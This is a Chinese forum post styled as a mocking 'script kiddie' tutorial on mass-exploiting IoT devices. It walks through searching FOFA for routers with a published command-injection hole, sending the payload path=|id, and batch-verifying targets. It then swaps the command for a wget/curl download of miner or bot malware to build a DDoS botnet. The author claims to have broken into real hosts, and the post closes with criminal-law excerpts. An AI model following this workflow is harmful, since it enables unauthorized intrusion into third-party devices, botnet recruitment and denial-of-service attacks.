用FOFA检索全网复现高危命令执行漏洞(脚本小子教程)
章鱼wheat2024/03/24原创 软件综合 IP:江西

image.png

随便找个漏洞公布平台 PeiQi文库 (XXXXXXXXXX) 随便找个漏洞

image.png

打开FOFA输入文章中的特征进行搜索,随便点几个匹配数据看看(FOFA自述: FOFA 是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配,例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等)

image.png

好了,花费了几秒钟的时间,漏洞成功复现,免费白嫖(入侵/盗窃)了一个亚马逊windows主机,本篇文章就到这里了...


更详细的(硬塞内容):

首先 使用搜索引擎搜索个漏洞公布平台

    渗透测试web安全漏洞库exp&poc集合 (XXXXXX)

任意选一个

    PeiQi0/PeiQi-WIKI-Book: 面向网络安全从业者的知识文库 (XXXXXXXXXX) 

找个你想复现的漏洞(离公布漏洞时间越近越好)例如这个

    百为通达 智能流控路由器 open 远程命令执行漏洞 | PeiQi文库 (XXXXXXXXXX)

image.png

把FOFA搜索词丢入到FOFA中搜

下面描述的复现方法也十分简洁,不需要任何权限,只需要GET访问 /goform/webRead/open/?path=|id  就会执行id命令并有回显

    搜索结果 "BYTEVALUE 智能流控路由器" - 网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统

image.png

如需导出数据,批量验证就可以用FOFA自带的下载功能
image.png
或者使用类似fofa_viewer的github开源软件(如需要导出1W条需要开fofa会员)

    (wgpsec/fofa_viewer: A simple FOFA client written in JavaFX. Made by WgpSec, Maintained by f1ashine. (XXXXXXXXXX))  

image.png

经过手动测试,成功找到一个具有漏洞的流控路由,成功收获了第二个免费的'设备' 

image.png

image.png

mips物联网设备常见架构之一 

image.png

接下来的常见操作就是丢木马程序,让此类的物联网设备成为你的肉鸡,然后用数以万计的这样的肉鸡去DDOS攻击其他服务器

假设各个肉鸡都是百兆上传,[阿里云产品默认具有500 Mbps~5 Gbps的免费的DDoS基础防护能力] [腾讯云全量用户默认可享受不超过2Gbps防护],最少只需要5只最多只需要50只这样的肉鸡就能轻松把普通阿里云服务器'打死'(暂时关闭了此IP所有的对外开放端口,外部无法连接,也就是'打死'了)

获取50个肉鸡难吗,非常的容易,现在物联网设备遍地都是,也不会有几个企业/网吧/学校/医院/个人... 会去盯着自己的WIFI,摄像头,打印机... 看看有没有什么高危漏洞,看见了然后去官网下载个最新的固件,登录到设备后台更新(有的设备会自动后台更新),只需要你随便找几个公开的漏洞,然后使用类似fofa之类的网络资产搜索引擎(没钱的话你甚至可以去咸鱼,淘宝购买一个共享的会员账号),把所有匹配特征的IP都导出,然后写一个批量验证脚本,后台一挂,搭建个从github上下载的botnet源码,闭上眼睛倒数5个数一睁眼就有50只了,几乎没有任何成本,只需要一个几美元的国外服务器,你就可以成为一个大众眼里的'DDOS黑客/大佬'

知名的D-LINK TP-LINK 小米 海康威视 华硕 中兴 H3C DrayTek 锐捷 等等 都有类似的非常简单的命令执行漏洞 其设备数也十分的庞大 发现这种漏洞也只需要时间成本(如何简单的找到此类漏洞,以后再说)

发现这种简单的漏洞怎么办呢?卖给黑产? OR 十分正义的提交给厂商? 又或者卖给黑产然后转头给十分正义的提交给厂商???

使用某个'电报'软件在搜索工具中搜索相关关键词 就会发现一个频道

2美元 攻击一次 1.6T流量 再浏览前几个月的信息可知最高达到了1.9T...... 
image.png

根据其频道内容可发现一个测量机器人,进去一看......4Tbps流量(40,000/4W只百兆带宽的肉鸡或者是400,000/四十万十兆上传带宽的肉鸡)...   

image.png

(使用google搜索还能发现免费的DDOS网站)

总结 成为DDOS黑客的简略流程:

    发现新公开漏洞  -使用网络资产搜索引擎搜索对应特征查看其设备数,并提取出来 - 去github寻找是否有对应利用脚本 没有并且不会写python代码就把公布的POC丢给CHATGPT  - 将执行的命令修改为|下载挖矿/僵尸木马(wget xxx curl -O  xxx) 运行挖矿/僵尸木马 (./木马名称)|  - 运行批量传马脚本后翘个二郎腿喝着咖啡坐看僵尸控制面板的僵尸数量上涨 - 使用手机对着电脑屏幕录像,展示使用僵尸控制面板对着一个服务器IP进行攻击,将视频发布至短视频平台并配上"黑客在线收徒 388r/人 手把手教你黑客知识,搭建僵尸网络,入侵服务器,DDOS 速来"   这样你就能赚到黑客之路的第一桶金/第一对手铐


违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。
违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。
故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后果严重的,依照第一款的规定处罚。
单位犯前三款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照第一款的规定处罚。

《关于办理危害计算机信息系统安全刑事案件应用法律若干问题的解释》

破坏计算机信息系统功能、数据或者应用程序,具有下列情形之一的,应当认定为刑法第二百八十六条第一款和第二款规定的“后果严重”:
一)
造成十台以上计算机信息系统的主要软件或者硬件不能正常运行的;  (DDOS会占用肉鸡大量的上行带宽,CPU,能够很轻松的导致设备卡死,导致主要软件或硬件不能正常运行,只需要10只肉鸡就能轻松'后果严重'了,很刑)
(二)对二十台以上计算机信息系统中存储、处理或者传输的数据进行删除、修改、增加操作的;
(三)违法所得五千元以上或者造成经济损失一万元以上的;
(四)造成为一百台以上计算机信息系统提供域名解析、身份认证、计费等基础服务或者为一万以上用户提供服务的计算机信息系统不能正常运行累计一小时以上的;
(五)造成其他严重后果的。
实施前款规定行为,具有下列情形之一的,应当认定为破坏计算机信息系统“后果特别严重”:
(一)数量或者数额达到前款第(一)项至第(三)项规定标准五倍以上的;
(二)造成为五百台以上计算机信息系统提供域名解析、身份认证、计费等基础服务或者为五万以上用户提供服务的计算机信息系统不能正常运行累计一小时以上的;
(三)破坏国家机关或者金融、电信、交通、教育、医疗、能源等领域提供公共服务的计算机信息系统的功能、数据或者应用程序,致使生产、生活受到严重影响或者造成恶劣社会影响的;
(四)造成其他特别严重后果的。


[修改于 8个月1天前 - 2024/03/25 02:00:19]

来自:计算机科学 / 软件综合动手实践:实验报导
0
3
已屏蔽 原因:{{ notice.reason }}已屏蔽
{{notice.noticeContent}}
~~空空如也

想参与大家的讨论?现在就 登录 或者 注册

所属专业
上级专业
同级专业
章鱼wheat
进士 机友 笔友
文章
20
回复
290
学术分
0
2022/10/23注册,2分14秒前活动

年龄:2007-09-0* <h1 style="font-size: 150px;">大</h1> <h1 style="font-size: 10px;">小</h1> <div class="article-panel-count"><div class="fa fa-thumbs-up"></div><span>9999</span></div> <img src="XXXXXXXXXXXXXXXXXXXXXXXX:81/sticker/315491"> <button class="btn btn-primary">测试</button> <button class="m-b-05 m-r-05 btn-sm btn-default btn">测试</button> <a class="pointer" onclick="document.write('')">测试</a> <label><input type="checkbox" value="11"><span>测试</span></label>

主体类型:个人
所属领域:无
认证方式:手机号
IP归属地:江西
文件下载
加载中...
{{errorInfo}}
{{downloadWarning}}
你在 {{downloadTime}} 下载过当前文件。
文件名称:{{resource.defaultFile.name}}
下载次数:{{resource.hits}}
上传用户:{{uploader.username}}
所需积分:{{costScores}},{{holdScores}}下载当前附件免费{{description}}
积分不足,去充值
文件已丢失

当前账号的附件下载数量限制如下:
时段 个数
{{f.startingTime}}点 - {{f.endTime}}点 {{f.fileCount}}
视频暂不能访问,请登录试试
仅供内部学术交流或培训使用,请先保存到本地。本内容不代表科创观点,未经原作者同意,请勿转载。
音频暂不能访问,请登录试试
支持的图片格式:jpg, jpeg, png
插入公式
评论控制
加载中...
文号:{{pid}}
投诉或举报
加载中...
{{tip}}
请选择违规类型:
{{reason.type}}

空空如也

加载中...
详情
详情
推送到专栏从专栏移除
设为匿名取消匿名
查看作者
回复
只看作者
加入收藏取消收藏
收藏
取消收藏
折叠回复
置顶取消置顶
评学术分
鼓励
设为精选取消精选
管理提醒
编辑
通过审核
评论控制
退修或删除
历史版本
违规记录
投诉或举报
加入黑名单移除黑名单
查看IP
{{format('YYYY/MM/DD HH:mm:ss', toc)}}